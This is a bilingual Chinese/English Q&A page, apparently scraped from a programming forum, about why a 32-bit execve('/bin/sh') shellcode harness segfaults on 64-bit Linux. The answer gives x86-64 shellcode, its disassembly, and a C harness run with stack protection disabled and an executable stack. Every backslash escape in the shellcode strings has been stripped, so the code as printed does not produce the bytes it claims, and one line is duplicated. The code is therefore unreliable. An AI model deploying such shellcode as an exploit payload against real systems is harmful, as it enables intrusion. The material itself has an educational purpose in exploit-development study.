shellcode 缓冲区溢出 -SegFault [英] shellcode buffer overflow -SegFault
问题描述
我正在尝试运行这个 shellcode,但我不断收到分段错误
I'm trying to run this shellcode but I keep getting segmentation fault
/* call_shellcode.c */
/*A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
const char code[] =
"x31xc0" /* Line 1: xorl %eax,%eax */
"x50" /* Line 2: pushl %eax */
"x68""//sh" /* Line 3: pushl $0x68732f2f */
"x68""/bin" /* Line 4: pushl $0x6e69622f */
"x89xe3" /* Line 5: movl %esp,%ebx */
"x50" /* Line 6: pushl %eax */
"x53" /* Line 7: pushl %ebx */
"x89xe1" /* Line 8: movl %esp,%ecx */
"x99" /* Line 9: cdq */
"xb0x0b" /* Line 10: movb $0x0b,%al */
"xcdx80" /* Line 11: int $0x80 */
;
int main(int argc, char **argv)
{
char buf[sizeof(code)];
strcpy(buf, code);
((void(*)( ))buf)( );
}
我编译它使用:
gcc -z execstack -o call_shellcode call_shellcode.c
和
gcc -fno-stack-protector -z execstack -o call_shellcode call_shellcode.c
但我不断收到分段错误
另外,我正在运行 64 位 Linux 系统 (ubuntu)
Also, I'm running a 64 bit Linux system (ubuntu)
推荐答案
您在 x86-64 系统上使用 32 位汇编代码.所以,这是你的问题,你必须为 x86-64 系统创建你的 shellcode.
You are using a 32 bit assembly code on a x86-64 system. So, It is your problem, you have to create your shellcode for x86-64 systems.
例如
400078: 48 31 c0 xor rax,rax
40007b: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f
400082: 2f 73 68
400085: 48 31 f6 xor rsi,rsi
400088: 56 push rsi
400089: 57 push rdi
40008a: 48 89 e7 mov rdi,rsp
40008d: 48 31 d2 xor rdx,rdx
400090: b0 3b mov al,0x3b
400092: 0f 05 syscall
与 32 位汇编的主要区别之一是如何使用 系统调用.在这个链接 Linux Syscalls x86-64 你可以看到你需要哪些寄存器来调用 sys_execve
One of the main differences with 32 bits assembly, is how to use the syscalls. In this link Linux Syscalls x86-64 you can see what registers you need to call the sys_execve
int execve(const char *filename, char *const argv[],char *const envp[]);
int execve(const char *filename, char *const argv[], char *const envp[]);
- const char *filename -> rdi
- char *const argv[] -> rsi
- char *const envp[] -> rdx
例如
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
const char code[] = "x48x31xc0x48xbfx2fx2fx62x69x6ex2fx73x68x48x31xf6x56x57x48x89xe7x48x31xd2xb0x3bx0fx05";
int main(int argc, char **argv)
{
char buf[sizeof(code)];
strcpy(buf, code);
((void(*)( ))buf)( );
}
编译并测试它.
$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
$ ./shellcode
$ uname -a
Linux foobar 4.4.0-97-generic #120-Ubuntu SMP Tue Sep 19 17:28:18 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
这篇关于shellcode 缓冲区溢出 -SegFault的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!